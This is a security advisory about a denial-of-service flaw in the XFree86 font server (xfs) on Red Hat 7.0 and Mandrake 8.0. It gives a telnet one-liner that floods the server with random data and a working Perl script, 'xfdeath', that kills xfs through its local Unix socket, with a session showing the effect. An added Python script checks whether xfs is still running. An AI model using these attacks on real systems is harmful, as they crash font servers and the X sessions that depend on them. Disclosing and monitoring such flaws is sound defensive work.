COMMAND
xfs
SYSTEMS AFFECTED
Linux
PROBLEM
xfs from the package XFree86-xfs-4.0.1-1 (i386.rpm), RedHat 7.0
appears to be vulnerable to a Denial of Service attack. To cause
xfs to stop responding to requests, try the following:
$ telnet victim xfs </dev/urandom
Repeat about 100 (or 1000) times and you get a Connection refused
message.
Regular X servers can then no longer connect; they usually crash
stating "Could not open default font 'fixed'" and will probably be
disabled for 5 minutes if run from inittab.
Valentine M. Smith found this originally. It has since been
confirmed on Mandrake 8.0 as well.
The TCP attack against the font server is (obviously) only
applicable to font servers listening on TCP (which is probably
only the case for systems serving X terminals).
If we want to kill a font-server running on the
Mandrake/Redhat/whatever *default* setup, we have to send the
garbage to the Unix-Domain socket instead.
[user@userland ~]$ ps -ax|grep xfs
3690 ? S 0:00 xfs -port -1 -daemon -user xfs
3723 pts/2 S 0:00 grep xfs
[user@userland ~]$ ./xfdeath
[user@userland ~]$ ps -ax|grep xfs
3780 pts/1 S 0:00 grep xfs
[user@userland ~]$ cat xfdeath
#!/usr/bin/perl -w
use Socket;
use strict;
my ($grab, $line, $garbagebyte, $i, $STOP);
sub darned {
    $STOP=1;
}
open(GARBAGE, "/dev/urandom") || die "cannot read /dev/urandom: $!";
$SIG{'PIPE'} = 'darned';
for ($i = 0; $i < 1000; ++$i)
{
    $STOP=0;
    $grab = shift || '/tmp/.font-unix/fs-1';
    socket(A_SOCKET, PF_UNIX, SOCK_STREAM, 0) || die "socket: $!";
    connect(A_SOCKET, sockaddr_un($grab)) || die "connect: $!";
    while (!$STOP) {
        read(GARBAGE, $garbagebyte, 1);
        print ".";
        print A_SOCKET $garbagebyte;
    }
}
exit;
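An added example (not part of the original advisory): a Python check that reads `ps -ax` output like the listings above and reports whether xfs is still running and whether it accepts TCP clients or only the local Unix socket. The function names and the default TCP port of 7100 are assumptions, and the third sample listing is constructed.

```python
import re

DEFAULT_TCP_PORT = 7100  # assumption: port xfs uses when no -port option is given

# BEFORE and AFTER are copied from the advisory's session; TCP_SERVER is constructed.
BEFORE = """ 3690 ? S 0:00 xfs -port -1 -daemon -user xfs
 3723 pts/2 S 0:00 grep xfs"""
AFTER = " 3780 pts/1 S 0:00 grep xfs"
TCP_SERVER = " 412 ? S 0:00 /usr/X11R6/bin/xfs -daemon -user xfs"

def xfs_processes(ps_output):
    """Return [(pid, argv)] for xfs processes; columns are PID TTY STAT TIME COMMAND."""
    found = []
    for line in ps_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or not fields[0].isdigit():
            continue
        argv = fields[4:]
        # Match on the executable name only, so "grep xfs" is not counted.
        if argv[0].rsplit("/", 1)[-1] == "xfs":
            found.append((int(fields[0]), argv))
    return found

def tcp_port(argv):
    """Return the TCP port xfs listens on, or None when started with -port -1."""
    port = DEFAULT_TCP_PORT
    for flag, value in zip(argv, argv[1:]):
        if flag == "-port" and re.fullmatch(r"-?\d+", value):
            port = int(value)
    return None if port < 0 else port

def audit(ps_output):
    """Report whether xfs is alive and which transport accepts client data."""
    procs = xfs_processes(ps_output)
    if not procs:
        return {"running": False,
                "findings": ["xfs not running: X servers cannot open fonts"]}
    findings = []
    for pid, argv in procs:
        port = tcp_port(argv)
        if port is None:
            findings.append(f"pid {pid}: TCP disabled, local Unix socket only")
        else:
            findings.append(f"pid {pid}: listening on TCP {port}, accepts network clients")
    return {"running": True, "findings": findings}

if __name__ == "__main__":
    for name, sample in (("before", BEFORE), ("after", AFTER), ("tcp", TCP_SERVER)):
        print(name, audit(sample))
```

Run from cron or a monitoring agent against live `ps -ax` output, the "not running" result is the signal that the font server has died and X servers will fail to start.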
SOLUTION
Nothing yet.